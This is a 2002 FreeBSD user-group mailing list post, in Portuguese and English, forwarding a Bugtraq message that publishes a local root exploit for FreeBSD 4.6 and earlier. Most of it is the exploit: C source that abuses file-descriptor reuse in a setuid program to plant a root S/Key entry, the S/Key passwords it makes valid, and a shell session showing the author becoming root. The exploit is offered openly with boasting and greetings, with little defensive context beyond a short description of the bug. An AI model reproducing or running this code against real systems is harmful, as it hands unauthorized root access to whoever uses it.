[FUGSPBR] Fwd: Freebsd FD exploit

Ter Ago 20 09:24:29 BRT 2002

talvez isso seja interessante hein... ;)

tomem cuidado com as "shellzinhas" que voces dao para os seus "very good 
friends" nos seus servidores hehehe.

Abraços,

>Mailing-List: contact bugtraq-help em securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq em securityfocus.com>
>List-Help: <mailto:bugtraq-help em securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe em securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe em securityfocus.com>
>Delivered-To: mailing list bugtraq em securityfocus.com
>Delivered-To: moderator for bugtraq em securityfocus.com
>From: "dvdman" <dvdman em l33tsecurity.com>
>To: <bugtraq em lists.securityfocus.com>
>Subject: Freebsd FD exploit
>Date: Sun, 18 Aug 2002 21:01:13 -0400
>X-Mailer: Microsoft Outlook Express 6.00.2600.0000
>
>/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd
>thought they fixed this months ago well guess again :P Thanks to the
>Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */
>
>

Felipe Neuwald
Consultor de Segurança de Sistemas
felipe em aker.com.br

-------------- Próxima Parte ----------
/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd 
thought they fixed this months ago well guess again :P Thanks to the 
Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */

/* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I 
AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM 
FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I 
AM FREE* */

DVDMAN(DVDMAN em L33TSECURITY.COM)
Visit Us: irc.efnet.org #l33tsecurity
www.l33tsecurity.com

And Freebsd thought they fixed this :P

GREETS:
thanks phased for skeys from iosmash.c :)
thanks all of #l33tsecurity for support
thanks Georgi Guninski for ideas

Details: 
Several months ago Joost Pol <joost em pine.nl> made public almost the same
problem. FreeBSD fixed it, but the patch does not cover all the cases. In
some cases the kernel closes fds 0..2 after they are assigned to /dev/null,
leaving the system open to an attack. If a +s file is execed and fds 0..2
are opened to /proc/curproc/{special} then the kernel forcefully closes
them and open() then reuses them.

this program makes the following skeys valid

  95: CARE LIVE CARD LOFT CHIC HILL
  96: TESS OIL WELD DUD MUTE KIT
  97: DADE BED DRY JAW GRAB NOV
  98: MASS OAT ROLL TOOL AGO CAM
  99: DARK LEW JOLT JIVE MOS WHO

PROOF:
[dvdman em xxxx:~]$ uname -a
FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul27 20:16:20 GMT 2002     dvdman em xxxx:/usr/obj/usr/src/sys/xxx  i386
[dvdman em xxxx:~]$ gcc iosmash2.c
[dvdman em xxxx:~]$ ./a.out
Adding dvdman:
ctrl-c
[dvdman em xxxx:~]$ su
s/key 98 snosoft2
Password:
[root em xxxx:/home/dvdman]#

*/

#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
int main(int argc, char *argv[])
{
int f;
int ret;

while(dup(1) != -1) {};
close(2);
close(3);
f=open("/proc/curproc/mem",O_WRONLY);
if (f==-1) fprintf(stdout,"Error in open /proc\n");
fprintf(stdout,"press ctrl-c when adding...");
ret = execl("/usr/bin/keyinit","\nroot 0099 snosoft2    6f648e8bd0e2988a Apr 23,2666 01:02:03\n",0);
if(ret == -1) {
fprintf(stdout,"execl() failed: %s (%d)\n",strerror(errno),errno);
}
}